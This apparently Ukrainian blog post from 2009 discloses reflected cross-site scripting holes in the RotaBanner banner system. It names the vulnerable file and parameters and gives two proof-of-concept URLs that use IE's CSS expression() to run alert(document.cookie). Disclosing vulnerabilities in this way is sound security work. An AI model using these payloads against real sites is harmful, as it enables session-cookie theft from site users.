Нові уразливості в RotaBanner
23:54 31.03.2009У березні, 19.03.2009, я знайшов нові Cross-Site Scripting уразливості в банерній системі RotaBanner (виробництва Art. Lebedev Group).
Раніше я вже писав про уразливості в RotaBanner.
XSS (IE):
Уразливості в файлі send-password.html в параметрах drop та page.
http://site/send-password.html?drop=''style='xss:expression(alert(document.cookie))'&action-send=true
http://site/send-password.html?drop='&page='style='xss:expression(alert(document.cookie))'&action-send=true
Вразлива версія RotaBanner Local 3 та попередні версії.